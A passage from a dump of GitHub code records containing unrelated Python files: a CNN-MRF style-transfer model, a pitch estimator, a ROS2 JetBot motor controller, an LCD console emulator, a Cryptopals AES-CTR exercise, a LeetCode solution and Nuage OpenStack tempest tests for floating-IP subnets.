self.model, self.content_losses, self.style_losses, self.tv_loss = \\\n self.get_model_and_losses_resnet(style_image=style_image, content_image=content_image)\n\n def forward(self, synthesis):\n \"\"\"\n calculate loss and return loss\n :param synthesis: synthesis image\n :return:\n \"\"\"\n self.model(synthesis)\n style_score = 0\n content_score = 0\n tv_score = self.tv_loss.loss\n CF_score = 0\n SF_score = 0\n\n # calculate style loss\n for sl in self.style_losses:\n style_score += sl.loss\n SF_score += sl.fidelity # local pattern fidelity\n\n\n # calculate content loss\n for cl in self.content_losses:\n content_score += cl.loss\n CF_score += cl.fidelity # content fidelity\n\n\n # calculate final loss\n scale = 1\n loss = scale*(self.style_weight * style_score + self.content_weight * content_score + self.tv_weight * tv_score)\n CF_score_final = CF_score/len(self.content_losses)\n SF_score_final = SF_score/len(self.style_losses)\n return loss, CF_score_final, SF_score_final\n\n def 
update_style_and_content_image(self, style_image, content_image):\n \"\"\"\n update the target of style loss layer and content loss layer\n :param style_image:\n :param content_image:\n :return:\n \"\"\"\n # update the target of style loss layer\n x = style_image.clone()\n next_style_idx = 0\n i = 0\n for layer in self.model:\n if isinstance(layer, TVLoss) or isinstance(layer, ContentLoss) or isinstance(layer, StyleLoss): # or isinstance(layer, ContentFidelity):\n continue\n if next_style_idx >= len(self.style_losses):\n break\n x = layer(x)\n if i in self.style_layers:\n # extract feature of style image in vgg19 as style loss target\n self.style_losses[next_style_idx].update(x)\n next_style_idx += 1\n i += 1\n\n # update the target of content loss layer\n x = content_image.clone()\n next_content_idx = 0\n i = 0\n for layer in self.model:\n if isinstance(layer, TVLoss) or isinstance(layer, ContentLoss) or isinstance(layer, StyleLoss): # or isinstance(layer, ContentFidelity):\n continue\n if next_content_idx >= len(self.content_losses):\n break\n x = layer(x)\n if i in self.content_layers:\n # extract feature of content image in vgg19 as content loss target\n self.content_losses[next_content_idx].update(x)\n next_content_idx += 1\n i += 1\n \n # def get_metrics(self, synthesis):\n \n\n def get_model_and_losses(self, style_image, content_image):\n \"\"\"\n create network model by intermediate layer of vgg19 and some customized layer(style loss, content loss and tv loss)\n :param style_image:\n :param content_image:\n :return:\n \"\"\"\n vgg = models.vgg19(pretrained=True).to(self.device)\n model = nn.Sequential()\n content_losses = []\n style_losses = []\n # add tv loss layer\n tv_loss = TVLoss()\n model.add_module('tv_loss', tv_loss)\n\n next_content_idx = 0\n next_style_idx = 0\n\n for i in range(len(vgg.features)):\n if next_content_idx >= len(self.content_layers) and next_style_idx >= len(self.style_layers):\n break\n # add layer of vgg19\n layer = vgg.features[i]\n name = str(i)\n print(name, layer)\n model.add_module(name, layer)\n print('model: ', model)\n\n # add content loss layer\n if i in self.content_layers:\n target = model(content_image).detach()\n content_loss = ContentLoss(target)\n model.add_module(\"content_loss_{}\".format(next_content_idx), content_loss)\n content_losses.append(content_loss)\n next_content_idx += 1\n\n # add style loss layer\n if i in self.style_layers:\n target_feature = model(style_image).detach()\n style_loss = StyleLoss(target_feature, patch_size=self.patch_size, mrf_style_stride=self.mrf_style_stride,\n mrf_synthesis_stride=self.mrf_synthesis_stride, gpu_chunck_size=self.gpu_chunck_size, device=self.device)\n\n model.add_module(\"style_loss_{}\".format(next_style_idx), style_loss)\n style_losses.append(style_loss)\n next_style_idx += 1\n\n return model, content_losses, style_losses, tv_loss\n\n def get_model_and_losses_resnet(self, style_image, content_image):\n \"\"\"\n create network model by intermediate layer of resnet and some customized layer(style loss, content loss and tv loss)\n :param style_image:\n :param content_image:\n :return:\n \"\"\"\n vgg = models.resnet34(pretrained=True).to(self.device)\n model = nn.Sequential()\n content_losses = []\n style_losses = []\n content_fidelities = []\n # add tv loss layer\n tv_loss = TVLoss()\n model.add_module('tv_loss', tv_loss)\n # print(vgg._modules['layer1']._modules['2']._modules.keys())\n next_content_idx = 0\n next_style_idx = 0\n idx = 4\n for i in range(len(list(vgg.children())[:])):\n if 
next_content_idx >= len(self.content_layers) and next_style_idx >= len(self.style_layers):\n break\n # add layer of ResNet\n layer = list(vgg.children())[:][i]\n name = str(i)\n \n if i < 4:\n print(name, layer)\n model.add_module(name, layer)\n print('model: ', model)\n\n # add content loss layer\n if i in self.content_layers:\n target = model(content_image).detach()\n content_loss = ContentLoss(target)\n model.add_module(\"content_loss_{}\".format(next_content_idx), content_loss)\n content_losses.append(content_loss)\n \n next_content_idx += 1\n\n # add style loss layer\n if i in self.style_layers:\n target_feature = model(style_image).detach()\n style_loss = StyleLoss(target_feature, patch_size=self.patch_size, mrf_style_stride=self.mrf_style_stride,\n mrf_synthesis_stride=self.mrf_synthesis_stride, gpu_chunck_size=self.gpu_chunck_size, device=self.device)\n\n model.add_module(\"style_loss_{}\".format(next_style_idx), style_loss)\n style_losses.append(style_loss)\n next_style_idx += 1 \n else:\n for j in range(len(list(layer.children()))):\n sublayer = list(layer.children())[j]\n subname = str(j+idx)\n model.add_module(subname, sublayer)\n print('model: ', model)\n\n # add content loss layer\n if (j+idx) in self.content_layers:\n target = model(content_image).detach()\n\n content_loss = ContentLoss(target)\n model.add_module(\"content_loss_{}\".format(next_content_idx), content_loss)\n content_losses.append(content_loss)\n \n next_content_idx += 1\n\n # add style loss layer\n if (j+idx) in self.style_layers:\n target_feature = model(style_image).detach()\n style_loss = StyleLoss(target_feature, patch_size=self.patch_size, mrf_style_stride=self.mrf_style_stride,\n mrf_synthesis_stride=self.mrf_synthesis_stride, gpu_chunck_size=self.gpu_chunck_size, device=self.device)\n\n model.add_module(\"style_loss_{}\".format(next_style_idx), style_loss)\n style_losses.append(style_loss)\n next_style_idx += 1\n\n if j == len(list(layer.children())) - 1:\n idx = j+idx + 1\n\n return model, content_losses, style_losses, tv_loss\n","repo_name":"minhIMT97/Image-Synthesis-with-CNN-MRF","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"29127601676","text":"from sphinxbase.sphinxbase import Yin\nimport wave\nimport numpy as np\nimport ctypes\n\ndef f0estimate(wavFile, ltWindowLength=None):\n\n wv=wave.open(wavFile, 'rb')\n\n noOfSamples = wv.getnframes()\n windowPeriod = 0.025\n sampleRate = wv.getframerate()\n frameLength = int(sampleRate * windowPeriod)\n noOfFrames = noOfSamples/frameLength\n voiceTh = 0.1\n searchRange = 0.2\n smoothWindow = 2\n f0Max = 350\n f0Min = 85\n\n #Yin flen, voice_thresh, search_range, smooth_window\n yin = Yin(frameLength,voiceTh, searchRange, smoothWindow)\n yin.start()\n rawData = np.fromstring(wv.readframes(-1), 'Int16');\n data = np.ascontiguousarray(rawData, dtype=np.int16)\n f0s = []\n duration=0\n rejects = {'pvoice':0, 'range': 0, 'diff': 0}\n for i in xrange(noOfFrames):\n if ltWindowLength is not None and duration > ltWindowLength:\n break\n frame = data[i*frameLength:(i+1)*frameLength]\n yin.write(frame)\n result, period, diff = yin.read()\n if result and period > 0:\n pvoice=0\n if diff < 32768:\n pvoice = 1.0 - float(diff) / 32768\n if pvoice > 0.7:\n f0 = float(sampleRate)/period\n if f0 > f0Min and f0 < f0Max:\n duration = duration + windowPeriod\n f0s.append(f0)\n else:\n rejects['range'] = rejects['range'] + 1\n 
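# periodicity confidence at or below the 0.7 threshold: count the frame as an unvoiced rejection\n            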
else:\n rejects['pvoice'] = rejects['pvoice'] + 1\n else:\n rejects['diff'] = rejects['diff'] + 1\n yin.end()\n wv.close()\n return (float(noOfSamples)/sampleRate, f0s, rejects)\n\ndef computeTrajectoryStatistics(f0s):\n f0s_arr = np.array(f0s)\n f0_mean, f0_std, f0_max, f0_min, f0_median = np.mean(f0s_arr), np.std(f0s_arr), np.max(f0s_arr), np.min(f0s_arr), np.median(f0s_arr)\n return (f0_mean, f0_std, f0_max, f0_min, f0_median)\n","repo_name":"mihaipstef/asr-f0","sub_path":"f0test/lib/f0.py","file_name":"f0.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27409119300","text":"import rclpy\nfrom rclpy.node import Node\nimport time\nimport signal\nimport sys\nimport json\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\n\nclass JetBotMotorController(Node):\n\n def __init__(self):\n super().__init__('jetbot_motor_controller')\n self.declare_parameter('i2c_bus')\n self.declare_parameter('default_speed')\n self.declare_parameter('max_pwm')\n self.declare_parameter('type', 'waveshare')\n self.start_subscriptions();\n self.set_speed(self.get_parameter('default_speed')._value)\n self.motor_driver = Adafruit_MotorHAT(i2c_bus=int(self.get_parameter('i2c_bus')._value))\n self.motor_left_ID = 1\n self.motor_right_ID = 2\n self.motor_left = self.motor_driver.getMotor(self.motor_left_ID)\n self.motor_right = self.motor_driver.getMotor(self.motor_right_ID)\n self.all_stop()\n \n def start_subscriptions(self):\n self.cmd_vel = self.create_subscription(Twist, 'cmd_vel', self.on_cmd_vel, 1)\n self.cmd_dir = self.create_subscription(String, 'cmd_dir', self.on_cmd_dir, 1)\n self.cmd_raw = self.create_subscription(String, 'cmd_raw', self.on_cmd_raw, 10)\n self.cmd_str = self.create_subscription(String, 'cmd_str', self.on_cmd_str, 10)\n \n # directional commands (degree, speed)\n def on_cmd_dir(self, msg):\n self.get_logger().info('cmd_dir=%s' % msg.data)\n \n # velocity, twist commands (Twist)\n def on_cmd_vel(self, msg):\n x = msg.linear.x\n y = msg.angular.z/10\n\t\t \n if x>0 and y<0: #backward right\n self.set_pwm(self.motor_left_ID, (abs(y)+0.1))\n self.set_pwm(self.motor_right_ID, (0.2+y+0.1))\n elif x>0 and y>0: #backward left\n self.set_pwm(self.motor_left_ID, (0.2-y+0.1))\n self.set_pwm(self.motor_right_ID, (y+0.1))\n elif x<0 and y>0: #forward left\n self.set_pwm(self.motor_left_ID, (-(0.2-y)-0.1))\n self.set_pwm(self.motor_right_ID, -(y+0.1))\n elif x<0 and y<0: #forward right\n self.set_pwm(self.motor_left_ID, y-0.1)\n self.set_pwm(self.motor_right_ID, (-(0.2+y)-0.1))\n else:\n self.all_stop()\n \n # raw L/R motor commands (speed, speed)\n def on_cmd_raw(self, msg):\n self.get_logger().info(' cmd_raw=%s' % msg.data)\n move_data_recv = json.loads(msg.data)\n self.set_pwm(self.motor_left_ID, float(move_data_recv['left']))\n self.set_pwm(self.motor_right_ID, float(move_data_recv['right']))\n \n # simple string commands (left/right/forward/backward/stop)\n def on_cmd_str(self, msg):\n self.get_logger().info(' cmd_str=%s' % msg.data)\n self.move_dir(msg.data.lower())\n \n def set_pwm(self, motor_ID, value):\n \n max_pwm = float(self.get_parameter('max_pwm')._value)\n speed = int(min(max(abs(value * max_pwm), 0), max_pwm))\n \n if motor_ID == 1:\n motor = self.motor_left\n elif motor_ID == 2:\n motor = self.motor_right\n else:\n self.get_logger().error('set_pwm(%d, %f) -> invalid motor_ID=%d', motor_ID, value, motor_ID)\n 
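# unknown motor ID: log the bad request and return without driving any motor\n            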
return\n \n motor.setSpeed(speed)\n \n if value > 0:\n motor.run(Adafruit_MotorHAT.FORWARD)\n else:\n motor.run(Adafruit_MotorHAT.BACKWARD)\n \n def set_speed(self, speed):\n self.speed = float(speed)\n\n def move_dir(self, val):\n if val == \"left\":\n self.set_pwm(self.motor_left_ID, self.speed)\n self.set_pwm(self.motor_right_ID, (-1 * self.speed)) \n elif val == \"right\":\n self.set_pwm(self.motor_left_ID, self.speed)\n self.set_pwm(self.motor_right_ID, self.speed) \n elif val == \"backward\":\n self.set_pwm(self.motor_left_ID, self.speed)\n self.set_pwm(self.motor_right_ID, self.speed)\n elif val == \"forward\":\n self.set_pwm(self.motor_left_ID, (-1 * self.speed))\n self.set_pwm(self.motor_right_ID, (-1 * self.speed)) \n elif val == \"stop\":\n self.all_stop()\n else:\n self.get_logger().error('Direction not supported.')\n\n def all_stop(self):\n self.motor_left.setSpeed(0)\n self.motor_right.setSpeed(0)\n self.motor_left.run(Adafruit_MotorHAT.RELEASE)\n self.motor_right.run(Adafruit_MotorHAT.RELEASE)\n\ndef main(args=None):\n\n rclpy.init(args=args)\n\n node = JetBotMotorController()\n \n def stop_node(*args):\n node.all_stop()\n print(\"Releasing i2c motors and stopping the node...\")\n rclpy.shutdown()\n return True\n \n signal.signal(signal.SIGINT, stop_node)\n signal.signal(signal.SIGTERM, stop_node)\n \n try:\n rclpy.spin(node)\n except KeyboardInterrupt:\n pass\n\n node.destroy_node()\n \nif __name__ == '__main__':\n main()\n ","repo_name":"kyopark2014/aws-robomaker","sub_path":"cloud-connected-robots/building-cloud-connected-robots-reinvent2021/robot_ws/src/jetbot_base/jetbot_base/jetbot_motor_controller.py","file_name":"jetbot_motor_controller.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"30303602424","text":"from .utils import *\nfrom typing import List\nfrom .lcd_serial import LCD\n\n__all__ = ['Console']\n\nclass Console(LCD):\n def __init__(self, ser=None) -> None:\n self.ROM = [None]*8\n\n def send_cmd(self, cmd:str, data): \n if cmd == 'prn':\n print(data)\n elif cmd == 'ccg':\n print('ROM:',self.ROM)\n self.ROM[data[0]] = data[1:]\n elif cmd == 'prA':\n w = data[0]\n data = data[1:w+1]\n LROM = [self.ROM[i] if i != ord(' ') else ' ' for i in data if isinstance(i, int)]\n for L in range(8):\n s = ''\n for c in range(len(LROM)):\n # if self.ROM[c]:\n if LROM[c]:\n r = LROM[c]\n if r == ' ':\n s += ' '\n continue\n for x in range(5):\n if r[L] & (1 << (4-x)) != 0:\n s += '1'\n else:\n s += '0'\n s += ' '\n print(s.replace('0','░░').replace('1','██'))\n\n\n def send_cmdSafe(self, cmd:str, data:List):\n self.send_cmd(cmd, data)\n\n def send(self, s:bytearray):\n pass\n\n def ccg(self, index:int, chars:List[int], asleep:float=0.5):\n super().ccg(index, chars, 0)\n","repo_name":"x2nie/arabic-arduino","sub_path":"python/arabicArduino/lcd_console.py","file_name":"lcd_console.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1568667350","text":"import binascii\n\nfrom python.common.aes import xcryptCtr\n\n# nonce = 0\n# key = b'YELLOW SUBMARINE'\n# text = binascii.a2b_base64('L77na/nrFsKvynd6HzOoG7GHTLXsTVu9qvY/2syLXzhPweyyMTJULu/6/kXX0KSvoOLSFQ==')\n\nnonce = 1\nkey = b'YELLOW SUBMARINE'\ntext = b'\\x86kTQ\\x8d\\x8a\\xf4\\xc7\\x84k\\x8fU\\xccN\\xab\\xb5j\\xb4\\x13\\xa0y\\xb4\\xddc\\xbb\\xb1\\x97\\xfc\\x83\\x7f\\xd8i'\n\nif __name__ == '__main__':\n 
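# Decrypt the fixed challenge ciphertext with AES-CTR and print the plaintext. Sanity check first (assumes xcryptCtr returns bytes): the CTR keystream XOR is an involution, so applying it twice with the same key and nonce must round-trip.\n    assert xcryptCtr(xcryptCtr(text, key, nonce), key, nonce) == text\n    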
print(xcryptCtr(text, key, nonce))","repo_name":"uklineale/cryptoPals","sub_path":"python/set3/eighteen.py","file_name":"eighteen.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72900790942","text":"\"\"\"\nhttps://leetcode.com/problems/maximum-length-of-subarray-with-positive-product/\n\"\"\"\n\n\nclass Solution:\n def getMaxLen(self, nums: list[int]) -> int:\n N = len(nums)\n positives = [0] * N\n negatives = [0] * N\n\n if nums[0] > 0:\n positives[0] = 1\n elif nums[0] < 0:\n negatives[0] = 1\n\n for i in range(1, N):\n if nums[i] > 0:\n positives[i] = 1 + positives[i - 1] if positives[i - 1] else 1\n negatives[i] = 1 + negatives[i - 1] if negatives[i - 1] else 0\n elif nums[i] < 0:\n positives[i] = 1 + negatives[i - 1] if negatives[i - 1] else 0\n negatives[i] = 1 + positives[i - 1] if positives[i - 1] else 1\n\n return max(positives)\n","repo_name":"eronekogin/leetcode","sub_path":"2022/maximum_length_of_subarray_with_positive_product.py","file_name":"maximum_length_of_subarray_with_positive_product.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7603983482","text":"import netaddr\nimport uuid\n\nfrom oslo_log import log as logging\n\nfrom nuagetempest.lib.test import nuage_test\nfrom tempest.api.network.admin import test_floating_ips_admin_actions\nfrom tempest.lib.common.utils import data_utils\nfrom tempest.lib import exceptions\nfrom tempest import config\nfrom nuagetempest.lib import service_mgmt\nfrom nuagetempest.lib.utils import constants as nuage_constants\nfrom nuagetempest.services.nuage_client import NuageRestClient\nfrom nuagetempest.services.nuage_network_client import NuageNetworkClientJSON\nfrom tempest.api.network import base\n\n\nfrom tempest import test\n\nCONF = config.CONF\nLOG = logging.getLogger(__name__)\n\nclass FloatingIPTestAdminNuage(base.BaseAdminNetworkTest):\n\n @classmethod\n def setup_clients(cls):\n super(FloatingIPTestAdminNuage, cls).setup_clients()\n cls.nuage_vsd_client = NuageRestClient()\n\n # Overriding cls.client with Nuage network client\n cls.client = NuageNetworkClientJSON(\n cls.os.auth_provider,\n CONF.network.catalog_type,\n CONF.network.region or CONF.identity.region,\n endpoint_type=CONF.network.endpoint_type,\n build_interval=CONF.network.build_interval,\n build_timeout=CONF.network.build_timeout,\n **cls.os.default_params)\n\n cls.service_manager = service_mgmt.ServiceManager()\n\n if not cls.service_manager.is_service_running(nuage_constants.NEUTRON_SERVICE):\n cls.service_manager.comment_configuration_attribute(\n CONF.nuage_sut.nuage_plugin_configuration,\n nuage_constants.NUAGE_UPLINK_GROUP,\n nuage_constants.NUAGE_UPLINK)\n cls.service_manager.start_service(nuage_constants.NEUTRON_SERVICE)\n cls.service_manager.wait_for_service_status(nuage_constants.NEUTRON_SERVICE)\n\n @classmethod\n def resource_setup(cls):\n super(FloatingIPTestAdminNuage, cls).resource_setup()\n # resources required for uplink subnet\n cls.gateway = None\n cls.gatewayport = None\n cls.gatewayvlan = None\n cls.uplinksubnet = None\n\n @classmethod\n def resource_cleanup(cls):\n if cls.uplinksubnet:\n cls.nuage_vsd_client.delete_uplink_subnet(\n cls.uplinksubnet[0]['ID']) \n if cls.gatewayvlan:\n cls.nuage_vsd_client.delete_gateway_vlan(cls.gatewayvlan[0]['ID'])\n if cls.gatewayport:\n 
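# teardown runs child-to-parent: the vlan was removed above, and the port here must go before its parent gateway\n            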
cls.nuage_vsd_client.delete_gateway_port(cls.gatewayport[0]['ID'])\n if cls.gateway:\n cls.nuage_vsd_client.delete_gateway(cls.gateway[0]['ID'])\n super(FloatingIPTestAdminNuage, cls).resource_cleanup()\n \n @classmethod\n def create_gateway_port_vlan(cls, gw_type='VRSG', vlan_no=200):\n gw_name = data_utils.rand_name('gw-')\n cls.gateway = cls.nuage_vsd_client.create_gateway(\n gw_name, str(uuid.uuid4()), gw_type, None)\n gw_port_name = data_utils.rand_name('gw-port-')\n cls.gatewayport = cls.nuage_vsd_client.create_gateway_port(\n gw_port_name, 'test', 'ACCESS', cls.gateway[0]['ID']) \n cls.gatewayvlan = cls.nuage_vsd_client.create_gateway_vlan(\n cls.gatewayport[0]['ID'], 'test', vlan_no)\n \n\n# @classmethod\n def create_uplink_subnet(cls, parentID=\"\"):\n uplink_subnet_dict = {}\n uplink_subnet_dict['name'] = \"uplink-sub1\"\n uplink_subnet_dict['address'] = \"210.20.0.0\"\n uplink_subnet_dict['netmask'] = \"255.255.255.0\"\n uplink_subnet_dict['gateway'] = '210.20.0.1'\n uplink_subnet_dict['uplinkVportName'] = 'vlan1'\n uplink_subnet_dict['uplinkInterfaceIP'] = '210.20.0.2'\n uplink_subnet_dict['uplinkInterfaceMAC'] = \"00:11:22:33:44:55\"\n uplink_subnet_dict['uplinkGWVlanAttachmentID'] = cls.gatewayvlan[0]['ID']\n uplink_subnet_dict['sharedResourceParentID'] = parentID\n cls.uplinksubnet = cls.nuage_vsd_client.create_uplink_subnet(\n **uplink_subnet_dict)\n cls.addCleanup(cls.delete_uplink_subnet, str(cls.uplinksubnet[0]['ID']))\n\n def delete_uplink_subnet(self, subnet_id):\n self.uplinksubnet = None\n return self.nuage_vsd_client.delete_uplink_subnet(subnet_id)\n\n @classmethod\n def delete_gateway_port_vlan(cls):\n if cls.gatewayvlan:\n cls.nuage_vsd_client.delete_gateway_vlan(cls.gatewayvlan[0]['ID'])\n cls.gatewayvlan = None\n if cls.gatewayport:\n cls.nuage_vsd_client.delete_gateway_port(cls.gatewayport[0]['ID'])\n cls.gatewayport = None\n if cls.gateway:\n cls.nuage_vsd_client.delete_gateway(cls.gateway[0]['ID'])\n cls.gateway = None\n \n def create_fip_subnet(self, cidr, nuage_uplink=None):\n name = data_utils.rand_name('network-')\n kwargs = {'name': name,\n 'router:external': True}\n body = self.admin_networks_client.create_network(**kwargs)\n pubnet = body['network']\n self.addCleanup(self.admin_networks_client.delete_network, pubnet['id'])\n fipsub_name = data_utils.rand_name('fipsub-')\n kwargs = {'name': fipsub_name,\n 'network_id': pubnet['id'],\n 'ip_version': 4,\n 'cidr': cidr}\n if nuage_uplink:\n kwargs.update({'nuage_uplink': nuage_uplink})\n body = self.admin_subnets_client.create_subnet(**kwargs)\n self.assertEqual(fipsub_name, body['subnet']['name'])\n self.assertEqual(cidr, body['subnet']['cidr'])\n return body['subnet']\n\n def delete_fip_subnet(self, fipsubID):\n try:\n self.admin_subnets_client.delete_subnet(fipsubID)\n except Exception as exc:\n LOG.exception(exc)\n\n def add_uplink_key_to_plugin_file(self, nuage_uplink):\n self.service_manager.stop_service(nuage_constants.NEUTRON_SERVICE)\n # Add the shared zone ID to the plugin.ini file\n self.service_manager.set_configuration_attribute(\n CONF.nuage_sut.nuage_plugin_configuration,\n nuage_constants.NUAGE_UPLINK_GROUP,\n nuage_constants.NUAGE_UPLINK, \n nuage_uplink)\n self.service_manager.start_service(nuage_constants.NEUTRON_SERVICE)\n self.service_manager.wait_for_service_status(nuage_constants.NEUTRON_SERVICE)\n\n\n def delete_uplink_key_from_plugin_file(self):\n self.service_manager.stop_service(nuage_constants.NEUTRON_SERVICE)\n self.service_manager.comment_configuration_attribute(\n 
CONF.nuage_sut.nuage_plugin_configuration,\n nuage_constants.NUAGE_UPLINK_GROUP,\n nuage_constants.NUAGE_UPLINK)\n self.service_manager.start_service(nuage_constants.NEUTRON_SERVICE)\n self.service_manager.wait_for_service_status(nuage_constants.NEUTRON_SERVICE)\n\n @test.attr(type='smoke')\n def test_fipsubs_in_shared_domain_with_plugin_file(self):\n # TODO: add the test code here\n raise(exceptions.NotImplemented)\n pass\n\n @test.attr(type='smoke')\n def test_create_fipsubs_in_shared_domain(self):\n # Create first FIP subnet\n fipsub1 = self.create_fip_subnet('172.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub1['id'])\n\n # Get FIP parentID\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub1['id'], nuage_fipsubnet1[0]['name']) \n\n # Create uplink subnet on VSD\n self.create_gateway_port_vlan()\n\n self.create_uplink_subnet(parentID=nuage_fipsubnet1[0]['parentID'])\n\n # Verify the uplink-subnet parentID with the FIPsubnet parentID\n self.assertEqual(nuage_fipsubnet1[0]['parentID'],\n self.uplinksubnet[0]['sharedResourceParentID'])\n # Create FIP subnet with nuage_uplink option \n fipsub2 = self.create_fip_subnet('198.40.0.0/24', nuage_fipsubnet1[0]['parentID'])\n self.addCleanup(self.delete_fip_subnet, fipsub2['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub2['id'])\n nuage_fipsubnet2 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub2['id'], nuage_fipsubnet2[0]['name']) \n self.assertEqual(nuage_fipsubnet1[0]['parentID'],\n nuage_fipsubnet2[0]['parentID'])\n #self.delete_gateway_port_vlan()\n\n @test.attr(type='smoke')\n def test_show_fipsubs_in_shared_domain(self):\n fipsub = self.create_fip_subnet('172.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub['id'])\n # Check the nuage_uplink field in subnet-show\n body = self.admin_subnets_client.show_subnet(fipsub['id'])\n fipsub_show = body['subnet']\n # Get FIP parentID in VSD\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub['id'])\n nuage_fipsubnet = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub_show['id'], nuage_fipsubnet[0]['name'])\n self.assertEqual(fipsub_show['nuage_uplink'], nuage_fipsubnet[0]['parentID'])\n\n def test_fipsubs_in_shared_domain_negative(self):\n # Create fipsub with invalid UUID for nuage_uplink\n name = data_utils.rand_name('network-')\n kwargs = {'name': name,\n 'router:external': True}\n body = self.admin_networks_client.create_network(**kwargs)\n pubnet = body['network']\n self.addCleanup(self.admin_networks_client.delete_network, pubnet['id'])\n fipsub_name = data_utils.rand_name('fipsub-')\n kwargs = {'name': fipsub_name,\n 'network_id': pubnet['id'],\n 'ip_version': 4,\n 'cidr': '160.60.0.0/24',\n 'nuage_uplink' : '111111111'}\n self.assertRaises(exceptions.BadRequest,\n self.admin_subnets_client.create_subnet,\n **kwargs) \n\n # Creation FIP subnet with same cidr and nuage_uplink should fail\n fipsub1 = self.create_fip_subnet('172.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub1['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n\n kwargs = {'name': fipsub_name,\n 'network_id': pubnet['id'],\n 
'ip_version': 4,\n 'cidr': '172.40.0.0/24',\n 'nuage_uplink' : nuage_fipsubnet1[0]['parentID']}\n self.assertRaises(exceptions.ServerFault,\n self.admin_subnets_client.create_subnet,\n **kwargs)\n \n # Update of nuage_uplink is should not be allowed\n # Will Fail due to OPENSTACK-1083\n self.assertRaises(exceptions.BadRequest,\n self.admin_subnets_client.update_subnet,\n fipsub1['id'],\n nuage_uplink='c6166803-c4cb-40a0-805a-e42bbf4c0790')\n \n def test_fipsub_with_nuageuplink_and_uplinksub_no_parentID(self):\n # Create gateway, port and vlan on VSD\n self.create_gateway_port_vlan()\n # Create uplink subnet without passing parentID\n self.create_uplink_subnet()\n\n #self.uplinksubnet\n fipsub1 = self.create_fip_subnet('172.40.0.0/24', \n self.uplinksubnet[0]['parentID'])\n self.addCleanup(self.delete_fip_subnet, fipsub1['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub1['id'], nuage_fipsubnet1[0]['name'])\n self.assertEqual(self.uplinksubnet[0]['parentID'],\n nuage_fipsubnet1[0]['parentID'])\n \n def test_fipsub_with_uplinkID_in_file_and_uplinksub_no_parentID(self):\n # Create gateway, port and vlan on VSD\n self.create_gateway_port_vlan()\n # Create uplink subnet without passing parentID\n self.create_uplink_subnet()\n # place parentID in plugin file\n # and restart the neutron\n self.add_uplink_key_to_plugin_file(self.uplinksubnet[0]['parentID'])\n fipsub1 = self.create_fip_subnet('172.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub1['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub1['id'], nuage_fipsubnet1[0]['name'])\n self.assertEqual(self.uplinksubnet[0]['parentID'],\n nuage_fipsubnet1[0]['parentID'])\n self.delete_uplink_key_from_plugin_file()\n \n def test_fipsub_create_with_uplinkID_in_plugin_file(self):\n fipsub1 = self.create_fip_subnet('172.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub1['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n fipsub2 = self.create_fip_subnet('182.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub2['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub2['id'])\n nuage_fipsubnet2 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.add_uplink_key_to_plugin_file(nuage_fipsubnet1[0]['parentID'])\n # create a second subnet\n fipsub3 = self.create_fip_subnet('192.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub3['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub3['id'])\n nuage_fipsubnet3 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n # check if the fipsubnet created without nuage-uplink \n # option belongs to same shared zone\n self.assertEqual(nuage_fipsubnet1[0]['parentID'],\n nuage_fipsubnet3[0]['parentID'])\n # Create a fipsubnet with nuage-uplink option\n # overriding the nuage_uplink key in ini file\n fipsub4 = self.create_fip_subnet('201.40.0.0/24',\n nuage_fipsubnet2[0]['parentID'])\n self.addCleanup(self.delete_fip_subnet, fipsub4['id'])\n fip_extID = 
